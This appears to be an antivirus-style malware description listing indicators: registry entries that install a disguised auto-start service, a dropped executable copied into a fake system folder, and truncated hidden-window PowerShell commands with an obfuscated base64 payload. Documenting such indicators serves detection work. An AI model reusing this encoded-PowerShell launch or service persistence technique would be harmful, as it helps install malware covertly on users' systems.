Technical information
- [<HKLM>\System\CurrentControlSet\Services\msvcr120_clr0400] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msvcr120_clr0400] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData0013\msvcr120_clr0400.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEkAQQBDAEwAawBnAHQAPQAnAEcARABOAEsAWABlAHAAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBgAEkAVABgAHkAUABSAG8AVABvAGMATwBsACIAIAA9AC...
- %HOMEPATH%\376.exe
- %HOMEPATH%\376.exe to %WINDIR%\syswow64\nlsdata0013\msvcr120_clr0400.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEkAQQBDAEwAawBnAHQAPQAnAEcARABOAEsAWABlAHAAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBgAEkAVABgAHkAUABSAG8AVABvAGMATwBsACIAIAA9AC...' (with hidden window)